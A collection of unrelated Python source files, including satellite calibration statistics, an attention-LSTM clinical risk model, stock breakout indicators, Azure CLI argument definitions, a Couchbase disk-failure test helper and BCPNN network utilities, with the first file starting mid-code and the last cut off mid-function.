h5File_R = h5py.File(iFile, 'r')
# 针对 FY3D 做的调整, DCC_Percent 在 3D 是 3维, 3C 是 2维
percent = h5File_R.get('DCC_Percent')[2]
dn = h5File_R.get('DN_ADMs')[:]
ref = h5File_R.get('REF_ADMs')[:]
h5File_R.close()
except Exception as e:
self.FileLst.pop(iFile)
print str(e)
# 第一个数据
if self.empty:
self.percent = percent
self.dn = dn
self.ref = ref
# 其他数据追加
else:
self.percent = np.concatenate((self.percent, percent), axis=0)
self.dn = np.concatenate((self.dn, dn), axis=1)
self.ref = np.concatenate((self.ref, ref), axis=1)
self.empty = False
def dcc_data_process(data, share):
"""
计算所有通道指定的,3x3 或是 5x5或是其他区域的均值,中值,和概率密度
"""
# 均值
# 过滤无效值
# print mean.shape
dataMean = []
dataMedian = []
dataMode = []
# 根据通道数循环
for i in range(data.shape[0]):
idx = np.where(data[i] < 65535)
if len(idx[0]) != 0:
# 如果不是天充值需要计算 均值 中值 概率密度
mean = np.mean(data[i, idx])
median = np.median(data[i, idx])
hist, bin_edges = np.histogram(data[i, idx], share)
idx = np.argmax(hist)
mode = (bin_edges[idx] + bin_edges[idx + 1]) / 2
else: # 否则添加无效值
mean = np.nan
median = np.nan
mode = np.nan
dataMean.append(mean)
dataMedian.append(median)
dataMode.append(mode)
# list转成array
dataMean = np.array(dataMean)
dataMedian = np.array(dataMedian)
dataMode = np.array(dataMode)
return dataMean, dataMedian, dataMode
def dcc_data_write(title, data, outFile):
"""
title: 标题
data: 数据体
outFile:输出文件
"""
allLines = []
DICT_D = {}
FilePath = os.path.dirname(outFile)
if not os.path.exists(FilePath):
os.makedirs(FilePath)
if os.path.isfile(outFile) and os.path.getsize(outFile) != 0:
fp = open(outFile, 'r')
fp.readline()
Lines = fp.readlines()
fp.close()
# 使用字典特性,保证时间唯一,读取数据
for Line in Lines:
DICT_D[Line[:8]] = Line[8:]
# 添加或更改数据
Line = data
DICT_D[Line[:8]] = Line[8:]
# 按照时间排序
newLines = sorted(DICT_D.iteritems(), key=lambda d: d[0], reverse=False)
for i in xrange(len(newLines)):
allLines.append(str(newLines[i][0]) + str(newLines[i][1]))
fp = open(outFile, 'w')
fp.write(title)
fp.writelines(allLines)
fp.close()
else:
fp = open(outFile, 'w')
fp.write(title)
fp.writelines(data)
fp.close()
def get_file_list(dir_path, pattern=r'.*'):
"""
查找目录下的所有符合匹配模式的文件的绝对路径,包括文件夹中的文件
:param dir_path: (str)目录路径
:param pattern: (str)匹配模式 'hdf'
:return: (list) 绝对路径列表
"""
file_list = []
# 递归查找目录下所有文件
for root, dir_list, file_names in os.walk(dir_path):
for i in file_names:
m = re.match(pattern, i)
if m:
file_list.append(os.path.join(root, i))
return file_list
def load_day_ext(ext_file):
"""
读取日的 EXT 文件,返回 np.array
:param ext_file:
:return:
"""
names = ('date', 'avg', 'med', 'mod',
'dcc_files', 'dcc_point', 'dcc_precent', 'dcc_dim')
formats = ('object', 'f4', 'f4', 'f4',
'i4', 'i4', 'i4', 'i4')
data = np.loadtxt(ext_file,
converters={0: lambda x: datetime.strptime(x, "%Y%m%d")},
dtype={'names': names,
'formats': formats},
skiprows=1, ndmin=1)
return data
def month_average(day_data):
"""
由 EXT 日数据生成 EXT 月平均数据
:param day_data: EXT 日数据
:return:
"""
month_datas = []
ymd_s = day_data['date'][0] # 第一天日期
ymd_e = day_data['date'][-1] # 最后一天日期
date_s = ymd_s - relativedelta(days=(ymd_s.day - 1)) # 第一个月第一天日期
while date_s <= ymd_e:
# 当月最后一天日期
date_e = date_s + relativedelta(months=1) - relativedelta(days=1)
# 查找当月所有数据
day_date = day_data['date']
month_idx = np.where(np.logical_and(day_date >= date_s,
day_date <= date_e))
avg_month = day_data['avg'][month_idx]
med_month = day_data['med'][month_idx]
mod_month = day_data['mod'][month_idx]
dcc_files_month = day_data['dcc_files'][month_idx]
dcc_point_month = day_data['dcc_point'][month_idx]
dcc_precent_month = day_data['dcc_precent'][month_idx]
dcc_dim_month = day_data['dcc_dim'][month_idx]
ymd_data = date_s.strftime('%Y%m%d')
avg_data = avg_month.mean()
med_data = med_month.mean()
mod_data = mod_month.mean()
dcc_files_data = dcc_files_month.sum()
dcc_point_data = dcc_point_month.sum()
dcc_precent_data = dcc_precent_month[0]
dcc_dim_data = dcc_dim_month[0]
data = ('%-15s' + '%-15.6f' * 3 + '%-15d' * 4 + '\n') % (
ymd_data, avg_data, med_data, mod_data,
dcc_files_data, dcc_point_data, dcc_precent_data, dcc_dim_data)
month_datas.append(data)
date_s = date_s + relativedelta(months=1)
return month_datas
def run(rollday):
rollday = rollday
ipath = inCfg['ext'][satFlag]['ipath']
mpath = inCfg['ext'][satFlag]['mpath']
ifile = inCfg['ext'][satFlag]['regular']
percent = int(inCfg['ext'][satFlag]['percent'])
share = int(inCfg['ext'][satFlag]['share'])
window = int(inCfg['ext'][satFlag]['window'])
# lanch_date = inCfg['ext'][satFlag]['lanch_date']
# 按天处理
date_s, date_e = pb_time.arg_str2date(str_time)
while date_s <= date_e:
ymd = date_s.strftime('%Y%m%d')
######### 一、查找当前天滚动后的所有文件 ##############
FileLst = dcc_find_file(ipath, ifile, date_s, rollday)
######### 二、读取所rolldays条件内所有文件并对数据累加 #############
dcc = DccDataRead()
dcc.FileLst = FileLst
dcc.load()
if len(FileLst) != 0:
######### 三、计算中值,均值,概率密度 #############################
Dn_mean, Dn_median, Dn_mode = dcc_data_process(dcc.dn[:, :, window],
share)
Ref_mean, Ref_median, Ref_mode = dcc_data_process(
dcc.ref[:, :, window], share)
print 'rollday: %s, date: %s' % (rollday, ymd)
######### 四、写入数据,按照通道进行输出,规范dcc输出格式 ###########
######### 写入DN值
for i in range(Dn_mean.shape[0]):
band = i + 1
if i >= 4 and 'FY3C+MERSI' in satFlag:
band = band + 1
##### 1、拼接文件名
dnName = 'DCC_%s_DN_CH_%02d_Rolldays_%s_ALL_Daily.txt' % (
satFlag, band, rollday)
##### 2、拼接完整输出文件
dnOutFile = os.path.join(mpath, rollday, dnName)
dccFiles = len(FileLst)
DnPoints = len(dcc.dn[i, :, window])
##### 3、拼接文件头和数据体信息
Title = ('%-15s' * 8 + '\n') % (
'date', 'Avg', 'Med', 'Mod', 'dccFiles',
'dccPoint', 'dccPrecent', 'dccDim')
Data = ('%-15s' + '%-15.6f' * 3 + '%-15d' * 4 + '\n') % (
ymd, Dn_mean[i], Dn_median[i], Dn_mode[i],
dccFiles, DnPoints, percent, window)
##### 4、写入文件
dcc_data_write(Title, Data, dnOutFile)
######### 写入Ref值
for i in range(Ref_mean.shape[0]):
band = i + 1
if i >= 4 and 'FY3C+MERSI' in satFlag:
band = band + 1
##### 1、拼接文件名
refName = 'DCC_%s_REF_CH_%02d_Rolldays_%s_ALL_Daily.txt' % (
satFlag, band, rollday)
##### 2、拼接完整输出文件
refOutFile = os.path.join(mpath, rollday, refName)
dccFiles = len(FileLst)
RefPoints = len(dcc.ref[i, :, window])
##### 3、拼接文件头信息
Title = ('%-15s' * 8 + '\n') % (
'date', 'Avg', 'Med', 'Mod', 'dccFiles',
'dccPoint', 'dccPrecent', 'dccDim')
Data = ('%-15s' + '%-15.6f' * 3 + '%-15d' * 4 + '\n') % (
ymd, Ref_mean[i], Ref_median[i], Ref_mode[i],
dccFiles, RefPoints, percent, window)
##### 4、写入文件
dcc_data_write(Title, Data, refOutFile)
date_s = date_s + relativedelta(days=1)
print 'success daily: %s' % rollday
# 计算月平均
in_file = os.path.join(mpath, rollday)
file_list = get_file_list(in_file, r'.*Daily')
for day_file in file_list:
out_file = day_file.replace('Daily', 'Monthly')
title = ('%-15s' * 8 + '\n') % (
'date', 'Avg', 'Med', 'Mod', 'dccFiles',
'dccPoint', 'dccPrecent', 'dccDim')
day_datas = load_day_ext(day_file)
month_data = month_average(day_datas)
with open(out_file, 'w') as f:
f.write(title)
f.writelines(month_data)
print 'success Monthly: %s' % rollday
########################### 主程序入口 ############################
if __name__ == '__main__':
# 获取程序参数接口
args = sys.argv[1:]
help_info = \
u'''
【参数1】:SAT or SAT+SENSOR or SAT1_SAT2
【参数2】:yyyymmdd-yyyymmdd
'''
if '-h' in args:
print help_info
sys.exit(-1)
# 获取程序所在位置,拼接配置文件
MainPath, MainFile = os.path.split(os.path.realpath(__file__))
ProjPath = os.path.dirname(MainPath)
cfgFile = os.path.join(MainPath, 'global_dcc.cfg')
# 配置不存在预警
if not os.path.isfile(cfgFile):
print (u'配置文件不存在 %s' % cfgFile)
sys.exit(-1)
# 载入配置文件
inCfg = ConfigObj(cfgFile)
# # 开启进程池
# threadNum = 3
# pool = Pool(processes=int(threadNum))
if len(args) == 2: # 需要跟俩个参数执行
satFlag = args[0]
str_time = args[1]
roll_days = inCfg['ext'][satFlag]['rollday']
if isinstance(roll_days, str):
roll_days = [roll_days]
for num in roll_days:
run(num)
else: # 没有参数 输出帮助信息
print help_info
|
#!/usr/bin/env python
# coding: utf-8
import sys
import numpy as np
import pandas as pd
import tensorflow as tf
import scipy
from IPython.display import clear_output
from tensorflow.keras import activations, backend
get_ipython().run_line_magic('matplotlib', 'inline')
import matplotlib.pyplot as plt
import os.path
import tensorflow.keras as keras
from tensorflow.keras import backend as K
from tensorflow.keras import Model, Input
from tensorflow.keras.layers import Dense, Conv2D, MaxPooling2D, Dropout, Flatten,LSTM, TimeDistributed, Masking, Reshape, Lambda, RepeatVector, Permute, multiply
from tensorflow.keras.models import Sequential
from tensorflow.keras.callbacks import EarlyStopping
from sklearn.model_selection import StratifiedKFold, GridSearchCV, RepeatedKFold
from sklearn.utils import resample
from sklearn.metrics import roc_curve,roc_auc_score, confusion_matrix
from tensorflow.keras.wrappers.scikit_learn import KerasClassifier
from sklearn.model_selection import KFold
import shap as sh
from keras import backend as K
tf.compat.v1.disable_eager_execution()
# should be 2.1.0
tf.__version__
# function for attention layer
def attention(inputs, SHAPE):
n_steps = int(inputs.shape[1])
a = Permute((1, 2))(inputs)
a = Reshape((n_steps, SHAPE))(a)
a = Dense(SHAPE, activation='softmax', name='attention_vec')(a)
output_attention_mul = multiply([inputs, a])
return output_attention_mul
# function to extract activation weights
def get_activations(model, inputs, print_shape_only=False, layer_name=None, verbose=False):
activations = []
inp = model.input
if layer_name is None:
outputs = [layer.output for layer in model.layers]
else:
outputs = [layer.output for layer in model.layers if layer.name == layer_name]
funcs = [K.function([inp] + [K.learning_phase()], [out]) for out in outputs]
layer_outputs = [func([inputs, 1.])[0] for func in funcs]
for layer_activations in layer_outputs:
activations.append(layer_activations)
if verbose:
if print_shape_only:
print(layer_activations.shape)
else:
print(layer_activations)
return activations
# Function that creates the model based on parameters
def create_model(optimizer="adam", dropout=0.2, init='uniform', dense_nparams1=128, lr=0.001, n_wind=10):
input_layer = Input(shape=(n_wind, n_features))
x = attention(input_layer, n_features)
x = LSTM(dense_nparams1, activation='tanh', return_sequences=False, recurrent_dropout = dropout)(x)
preds = Dense(1, activation="sigmoid")(x)
model = Model(inputs=input_layer, outputs=preds)
RMS = keras.optimizers.RMSprop(lr=lr, rho=0.9, epsilon=1e-08)
model.compile(optimizer=RMS, loss='binary_crossentropy', metrics=['acc'])
return model
# Read training and test sets
train_x_path = "CardioICURisk/output/o4.x_train.csv"
test_x_path = "CardioICURisk/output/o4.x_test.csv"
train_y_path = "CardioICURisk/output/o4.y_train.csv"
test_y_path = "CardioICURisk/output/o4.y_test.csv"
x_train=np.loadtxt(open(train_x_path, 'rt'), delimiter=",", skiprows=1)
y_train=np.loadtxt(open(train_y_path, 'rt'), delimiter=",", skiprows=1, usecols = 1)
x_test=np.loadtxt(open(test_x_path, 'rt'), delimiter=",", skiprows=1)
y_test=np.loadtxt(open(test_y_path, 'rt'), delimiter=",", skiprows=1, usecols = 1)
# reshape from [samples, timesteps] into [samples, timesteps, features]
n_features = x_train.shape[1]
n_wind = 10
n_ind_train = int(x_train.shape[0]/n_wind)
n_ind_test = int(x_test.shape[0]/n_wind)
x_train = x_train.reshape((n_ind_train, 10, n_features))
x_test = x_test.reshape((n_ind_test, 10, n_features))
x_train.shape, y_train.shape, x_test.shape, y_train.shape
# select model's parameters based on best performance of 10-fold cross-validation
cv_res = pd.read_csv("CardioICURisk/output/o5.models_params.csv")
cv_res=cv_res.sort_values(by=['auc'], ascending=False)
dropout1= cv_res['dropout'].iloc[0]
unit_n1 = cv_res['unit_n'].iloc[0]
epoch_n1 = cv_res['epoch_n'].iloc[0]
lr1 = cv_res['lr'].iloc[0]
batch_n1 = cv_res['batch_n'].iloc[0]
# Create and train the model
K.clear_session()
model=create_model(optimizer="adam", dropout=dropout1, init='uniform', dense_nparams1=unit_n1, lr=lr1, n_wind=10)
model.fit(x_train, y_train, batch_size=batch_n1, epochs=epoch_n1,
validation_split=0.2, verbose=0)
# save output files
model.save('CardioICURisk/output/o5.fin_model.h5')
y_test_prob=model.predict(x_test)
np.savetxt("CardioICURisk/output/o5.fin_model_pred.csv", y_test_prob, delimiter=',')
activations = get_activations(model, x_test, print_shape_only=True, layer_name='attention_vec', verbose=True)[0]
act_2d=activations.transpose(0,2,1).reshape(x_test.shape[0], x_test.shape[2]*10)
np.savetxt("CardioICURisk/output/o5.fin_model_act.csv", act_2d, delimiter=',')
|
# coding: utf-8
import logging
import numpy as np
from ppyt.indicators import IndicatorBase
from ppyt.indicators.closerecenthighlow_indicators import (
CloseGtRecentHighIndicator, CloseLtRecentLowIndicator
)
logger = logging.getLogger(__name__)
class UpperBreakoutIndicator(IndicatorBase):
"""上にブレイクアウトしたかを示す指標です。"""
_findkey = 'UpperBreakout'
def _build_indicator(self, span, **kwds):
"""indicatorのデータを組み立てます。
Args:
span: 過去何日間の高値を上に抜いたか
"""
# 当日の高値が、前日までの直近高値を超えたかの指標を取得します。
indi = CloseGtRecentHighIndicator(stock=self.stock, span=span)
arr1 = indi.data
# 1日過去にずらした配列を取得します。
arr2 = indi.shifted(-1)
# 前日は直近高値以下で、当日に直近高値を超えているかを判定します。
return np.logical_and(arr1, np.logical_not(arr2))
class LowerBreakoutIndicator(IndicatorBase):
"""下にブレイクアウトしたかを示す指標です。"""
_findkey = 'LowerBreakout'
def _build_indicator(self, span, **kwds):
"""indicatorのデータを組み立てます。
Args:
span: 過去何日間の高値を上に抜いたか
"""
# 当日の安値が、前日までの直近安値を下回った指標を取得します。
indi = CloseLtRecentLowIndicator(stock=self.stock, span=span)
arr1 = indi.data
# 1日過去にずらした配列を取得します。
arr2 = indi.shifted(-1)
# 前日は直近安値以上で、当日に直近安値未満かを判定します。
return np.logical_and(arr1, np.logical_not(arr2))
|
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
# pylint: disable=too-many-lines
# pylint: disable=too-many-statements
from azure.cli.core.commands.parameters import (
tags_type,
get_three_state_flag,
resource_group_name_type,
get_location_type
)
from azure.cli.core.commands.validators import (
get_default_location_from_resource_group,
validate_file_or_dict
)
def load_arguments(self, _):
with self.argument_context('connectedmachine list') as c:
c.argument('resource_group_name', resource_group_name_type)
with self.argument_context('connectedmachine show') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('machine_name', options_list=['--name', '-n', '--machine-name'], type=str, help='The name of the '
'hybrid machine.', id_part='name')
with self.argument_context('connectedmachine delete') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('machine_name', options_list=['--name', '-n', '--machine-name'], type=str, help='The name of the '
'hybrid machine.', id_part='name')
with self.argument_context('connectedmachine extension list') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('machine_name', type=str, help='The name of the machine containing the extension.')
c.argument('expand', type=str, help='The expand expression to apply on the operation.')
with self.argument_context('connectedmachine extension show') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('machine_name', type=str, help='The name of the machine containing the extension.', id_part='name')
c.argument('name', options_list=['-n', '--extension-name', '--name'], type=str, help='The name of the machine '
'extension.', id_part='child_name_1')
with self.argument_context('connectedmachine extension create') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('machine_name', type=str, help='The name of the machine where the extension should be created or '
'updated.')
c.argument('name', options_list=['-n', '--extension-name', '--name'], type=str, help='The name of the machine '
'extension.')
c.argument('tags', tags_type)
c.argument('location', arg_type=get_location_type(self.cli_ctx),
validator=get_default_location_from_resource_group)
c.argument('force_update_tag', type=str, help='How the extension handler should be forced to update even if '
'the extension configuration has not changed.')
c.argument('publisher', type=str, help='The name of the extension handler publisher.')
c.argument('type_', options_list=['--type'], type=str, help='Specifies the type of the extension; an example '
'is "CustomScriptExtension".')
c.argument('type_handler_version', type=str, help='Specifies the version of the script handler.')
c.argument('auto_upgrade_minor_version', options_list=['--auto-upgrade-minor'],
arg_type=get_three_state_flag(), help='Indicates whether the extension should use a newer minor '
'version if one is available at deployment time. Once deployed, however, the extension will not '
'upgrade minor versions unless redeployed, even with this property set to true.')
c.argument('settings', type=validate_file_or_dict, help='Json formatted public settings for the extension. '
'Expected value: json-string/@json-file.')
c.argument('protected_settings', type=validate_file_or_dict, help='The extension can contain either '
'protectedSettings or protectedSettingsFromKeyVault or no protected settings at all. Expected '
'value: json-string/@json-file.')
with self.argument_context('connectedmachine extension update') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('machine_name', type=str, help='The name of the machine where the extension should be created or '
'updated.', id_part='name')
c.argument('name', options_list=['-n', '--extension-name', '--name'], type=str, help='The name of the machine '
'extension.', id_part='child_name_1')
c.argument('tags', tags_type)
c.argument('force_update_tag', type=str, help='How the extension handler should be forced to update even if '
'the extension configuration has not changed.')
c.argument('publisher', type=str, help='The name of the extension handler publisher.')
c.argument('type_', options_list=['--type'], type=str, help='Specifies the type of the extension; an example '
'is "CustomScriptExtension".')
c.argument('type_handler_version', type=str, help='Specifies the version of the script handler.')
c.argument('auto_upgrade_minor_version', options_list=['--auto-upgrade-minor'],
arg_type=get_three_state_flag(), help='Indicates whether the extension should use a newer minor '
'version if one is available at deployment time. Once deployed, however, the extension will not '
'upgrade minor versions unless redeployed, even with this property set to true.')
c.argument('settings', type=validate_file_or_dict, help='Json formatted public settings for the extension. '
'Expected value: json-string/@json-file.')
c.argument('protected_settings', type=validate_file_or_dict, help='The extension can contain either '
'protectedSettings or protectedSettingsFromKeyVault or no protected settings at all. Expected '
'value: json-string/@json-file.')
with self.argument_context('connectedmachine extension delete') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('machine_name', type=str, help='The name of the machine where the extension should be deleted.',
id_part='name')
c.argument('name', options_list=['-n', '--extension-name', '--name'], type=str, help='The name of the machine '
'extension.', id_part='child_name_1')
with self.argument_context('connectedmachine extension wait') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('machine_name', type=str, help='The name of the machine containing the extension.', id_part='name')
c.argument('name', options_list=['-n', '--extension-name', '--name'], type=str, help='The name of the machine '
'extension.', id_part='child_name_1')
|
import h5py
import os.path
from .training_aux_wrapper import file_and_key_to_save
# load back data.
def load_model_performance(dataset, image_subset, neuron_subset,
seed, arch_name, opt_name):
model_subtype = arch_name + '+' + opt_name
# then check whether exists or not.
dir_to_save, file_name_base, key_to_save = file_and_key_to_save('cnn_population', model_subtype,
dataset, image_subset, neuron_subset, seed)
result = dict()
with h5py.File(os.path.join(dir_to_save, file_name_base), 'r') as f_out:
grp = f_out[key_to_save]
# result['y_test_hat'] = grp['y_test_hat'][...]
result['corr'] = grp['corr'][...]
# result['corr_val'] = grp['corr_val'][...]
return result
|
from Jython_tasks.task import AutoFailoverNodesFailureTask, NodeDownTimerTask
class DiskError:
FAILOVER_DISK = "failover_disk"
DISK_FULL = "disk_full"
def __init__(self, logger, task_manager, orchestrator,
server_to_fail, timeout, pause_between_failover_action,
failover_expected, timeout_buffer, disk_timeout=120,
disk_location="/data", disk_size=5120):
self.log = logger
self.task_manager = task_manager
self.orchestrator = orchestrator
self.server_to_fail = server_to_fail
self.timeout = timeout
self.pause_between_failover_action = pause_between_failover_action
self.failover_expected = failover_expected
self.timeout_buffer = timeout_buffer
self.disk_timeout = disk_timeout
self.disk_location = disk_location
self.disk_location_size = disk_size
def create(self, action=None):
self.log.info("Simulation disk scenario '{0}'".format(action))
if action == DiskError.FAILOVER_DISK:
task = AutoFailoverNodesFailureTask(
self.task_manager, self.orchestrator, self.server_to_fail,
"disk_failure", self.timeout,
self.pause_between_failover_action, self.failover_expected,
self.timeout_buffer, disk_timeout=self.disk_timeout,
disk_location=self.disk_location,
disk_size=self.disk_location_size)
self.task_manager.add_new_task(task)
self.task_manager.get_task_result(task)
elif action == DiskError.DISK_FULL:
task = AutoFailoverNodesFailureTask(
self.task_manager, self.orchestrator, self.server_to_fail,
"disk_full", self.timeout, self.pause_between_failover_action,
self.failover_expected, self.timeout_buffer,
disk_timeout=self.disk_timeout,
disk_location=self.disk_location,
disk_size=self.disk_location_size)
self.task_manager.add_new_task(task)
self.task_manager.get_task_result(task)
else:
self.log.warning("Unsupported disk action '{0}'".format(action))
def revert(self, action=None):
self.log.info("Reverting disk scenario '{0}'".format(action))
if action == DiskError.FAILOVER_DISK:
action = "recover_disk_failure"
elif action == DiskError.DISK_FULL:
action = "recover_disk_full_failure"
else:
self.log.warning("Unsupported disk action '{0}'".format(action))
return
task = AutoFailoverNodesFailureTask(
self.task_manager, self.orchestrator, self.server_to_fail,
action, self.timeout, self.pause_between_failover_action,
expect_auto_failover=False, timeout_buffer=self.timeout_buffer,
check_for_failover=False, disk_timeout=self.disk_timeout,
disk_location=self.disk_location,
disk_size=self.disk_location_size)
self.task_manager.add_new_task(task)
self.task_manager.get_task_result(task)
|
from enum import Enum
class Shape(Enum):
SQUARE = 2
DIAMOND = 1
CIRCLE = 3
ALIAS_FOR_SQUARE = 2
print(Shape.SQUARE)
print(Shape.ALIAS_FOR_SQUARE)
print(Shape(2))
|
import json
import tempfile
from google.cloud import storage
import textparser
def handle_csv(file, sep=';', encoding='utf-8'):
parser = textparser.GenericParser()
for ix, line in enumerate(file):
line = line.decode(encoding).strip()
if ix == 0:
hdr = [field.lower() for field in line.split(sep)]
vals = [parser.parse(val) for val in line.split(sep)]
yield dict(zip(hdr, vals))
storage_client = storage.Client()
bucket = storage_client.get_bucket('ks-tmp')
blob = bucket.get_blob('inf_diario_fi_202005.csv')
temp = tempfile.TemporaryFile('wb+')
blob.download_to_file(temp)
temp.seek(0)
for ix, data in enumerate(handle_csv(temp)):
if ix > 10:
break
print(json.dumps(data))
temp.close() |
import numpy as np
import IPython
def log_epsilon(x, epsilon=1e-10):
return np.log(np.maximum(x, epsilon))
def calculate_probability(patterns):
"""
Returns the probability from a list of patterns to be learned
:param patterns: list of patterns to be learned
:return:
"""
p = np.zeros(patterns[0].size)
number_of_patterns = len(patterns)
for pattern in patterns:
p += pattern
p /= number_of_patterns
return p
def calculate_coactivations(patterns):
coactivations = np.zeros((patterns[0].size, patterns[0].size))
number_of_patterns = len(patterns)
for pattern in patterns:
coactivations += np.outer(pattern, pattern)
coactivations /= number_of_patterns
return coactivations
def get_w(P, p, diagonal_zero=True):
outer = np.outer(p, p)
w = log_epsilon(P) - log_epsilon(outer)
if diagonal_zero:
w[np.diag_indices_from(w)] = 0
return w
def get_w_pre_post(P, p_pre, p_post, p=1.0, epsilon=1e-20, diagonal_zero=True):
outer = np.outer(p_post, p_pre)
# w = np.log(p * P) - np.log(outer)
x = p * (P / outer)
# w = np.log(x)
w = log_epsilon(x, epsilon)
if diagonal_zero:
w[np.diag_indices_from(w)] = 0
return w
def get_beta(p, epsilon=1e-10):
probability = np.copy(p)
probability[p < epsilon] = epsilon
beta = np.log(probability)
return beta
def softmax(input, t=1.0, minicolumns=2):
"""Calculate the softmax of a list of numbers w.
Parameters
----------
w : list of numbers
t : float
Return
------
a list of the same length as w of non-negative numbers
Examples
--------
>>> softmax([0.1, 0.2])
array([ 0.47502081, 0.52497919])
>>> softmax([-0.1, 0.2])
array([ 0.42555748, 0.57444252])
>>> softmax([0.9, -10])
array([ 9.99981542e-01, 1.84578933e-05])
>>> softmax([0, 10])
array([ 4.53978687e-05, 9.99954602e-01])
"""
lower_bound = -600
upper_bound = 600
x = np.copy(input)
x_size = x.size
x = np.reshape(x, (x_size / minicolumns, minicolumns))
x = np.array(x) / t
x[x < lower_bound] = lower_bound
x[x > upper_bound] = upper_bound
e = np.exp(x)
dist = normalize_array(e)
dist = np.reshape(dist, x_size)
return dist
def normalize_array(array):
return array / np.sum(array, axis=1)[:, np.newaxis]
def normalize_p(p, hypercolumns, minicolumns):
x = p.reshape((hypercolumns, minicolumns))
x = x / np.sum(x, axis=1)[:, np.newaxis]
return x.reshape(hypercolumns * minicolumns)
def load_minicolumn_matrix(w, sequence_indexes, value=1, inhibition=-1, extension=1,
decay_factor=1.0, sequence_decay=1.0):
n_patterns = len(sequence_indexes)
# Transform it to linear decay
sequence_decay = value * sequence_decay
for index, pattern_index in enumerate(sequence_indexes[:-1]):
# Determine the value to load
sequence_value = value - sequence_decay * index
# This is in case it decays bellow 0
if sequence_value <= 0:
sequence_value = 0
# First we set the the sequence connection
from_unit = pattern_index
to_unit = sequence_indexes[index + 1]
# If the unit has never been modified change the value to store
w[to_unit, from_unit] = sequence_value
# Then set the after-effects (extension)
if index < n_patterns - extension - 1:
aux = extension
else:
aux = n_patterns - index - 1
aux_decay_factor = sequence_value * decay_factor
for j in range(1, aux):
to_unit = sequence_indexes[index + 1 + j]
to_store = sequence_value - aux_decay_factor * j
# If this gets bellow 0
if to_store <= 0:
to_store = 0
w[to_unit, from_unit] = to_store
def load_minicolumn_matrix2(w, sequence_indexes, value=1, inhibition=-1, extension=1,
decay_factor=1.0, sequence_decay=1.0):
n_patterns = len(sequence_indexes)
# Transform it to linear decay
sequence_decay = value * sequence_decay
for index, pattern_index in enumerate(sequence_indexes[:-1]):
# Determine the value to load
sequence_value = value - sequence_decay * index
if sequence_value <= 0:
sequence_value = 0
# First we set the the sequence connection
from_unit = pattern_index
to_unit = sequence_indexes[index + 1]
# If the unit has never been modified change the value to store
if w[to_unit, from_unit] == inhibition:
w[to_unit, from_unit] = sequence_value
# If the unit is bene modified before increase the plasticity
else:
w[to_unit, from_unit] += sequence_value
# Then set the after-effects (extension)
if index < n_patterns - extension - 1:
aux = extension
else:
aux = n_patterns - index - 1
aux_decay_factor = sequence_value * decay_factor
for j in range(1, aux):
to_unit = sequence_indexes[index + 1 + j]
to_store = sequence_value - aux_decay_factor * j
if to_store <= 0:
to_store = 0
# If the unit has never been modified change the value to store
if w[to_unit, from_unit] == inhibition:
w[to_unit, from_unit] = to_store
# If the unit is bene modified before increase the plasticity
else:
w[to_unit, from_unit] += to_store
w[to_unit, from_unit] = to_store
def load_diagonal(w, sequence_index, value=1.0):
for index, pattern_index in enumerate(sequence_index):
w[pattern_index, pattern_index] = value
def expand_matrix(w_small, hypercolumns, minicolumns):
w_big = np.zeros((minicolumns * hypercolumns, minicolumns * hypercolumns))
for j in range(hypercolumns):
for i in range(hypercolumns):
w_big[i * minicolumns:(i + 1) * minicolumns, j * minicolumns:(j + 1) * minicolumns] = w_small
return w_big
def artificial_connectivity_matrix(hypercolumns, minicolumns, sequences, value=1, inhibition=-1, extension=1,
decay_factor=0.5, sequence_decay=1.0, diagonal_zero=True, self_influence=True,
ampa=False):
w = np.ones((minicolumns, minicolumns)) * inhibition
if self_influence:
for sequence_indexes in sequences:
load_diagonal(w, sequence_indexes, value)
if not ampa:
for sequence_indexes in sequences:
load_minicolumn_matrix(w, sequence_indexes, value, inhibition, extension, decay_factor, sequence_decay)
# Create the big matrix
w_big = expand_matrix(w, hypercolumns, minicolumns)
# Remove diagonal
if diagonal_zero:
w_big[np.diag_indices_from(w_big)] = 0
return w_big
def artificial_beta_vector(hypercolumns, minicolumns, sequences, intensity, beta_decay):
small_beta = np.zeros(minicolumns)
pattern_indexes = [pattern for sequence in sequences for pattern in sequence]
for index, pattern_index in enumerate(pattern_indexes):
small_beta[pattern_index] += intensity * (beta_decay ** index)
# Now we make it bigger
beta = []
for i in range(hypercolumns):
beta = np.hstack((beta, small_beta))
return beta
def create_artificial_manager(hypercolumns, minicolumns, sequences, value, inhibition, extension, decay_factor,
sequence_decay, dt, BCPNNFast, NetworkManager, ampa=True, beta=False, beta_decay=1.0,
self_influence=True, values_to_save=['o']):
w_nmda = artificial_connectivity_matrix(hypercolumns, minicolumns, sequences, value=value, inhibition=inhibition,
extension=extension, decay_factor=decay_factor,
sequence_decay=sequence_decay,
diagonal_zero=True, self_influence=self_influence, ampa=False)
if ampa:
w_ampa = artificial_connectivity_matrix(hypercolumns, minicolumns, sequences, value=value, inhibition=inhibition,
extension=extension, decay_factor=decay_factor,
sequence_decay=sequence_decay,
diagonal_zero=True, self_influence=True, ampa=True)
nn = BCPNNFast(hypercolumns=hypercolumns, minicolumns=minicolumns, prng=np.random.RandomState(seed=0))
nn.w = w_nmda
if ampa:
nn.w_ampa = w_ampa
if beta:
nn.beta = artificial_beta_vector(hypercolumns, minicolumns, sequences, intensity=value, beta_decay=beta_decay)
manager = NetworkManager(nn, dt=dt, values_to_save=values_to_save)
for pattern_indexes in sequences:
manager.stored_patterns_indexes += pattern_indexes
return manager
def create_indepedent_sequences(minicolumns, sequence_length):
n_sequences = minicolumns / sequence_length
sequences = [[j*sequence_length + i for i in range(sequence_length)] for j in range(n_sequences)]
return sequences
def create_simple_overlap_sequences(minicolumns, sequence_length, overlap):
sequences = []
increase = sequence_length - overlap
starting_point = 0
while starting_point + sequence_length <= minicolumns:
sequences.append([starting_point + i for i in range(sequence_length)])
starting_point += increase
return sequences
# The functions for generating sequences
def test_overload_criteria(sample, overload_matrix, overload):
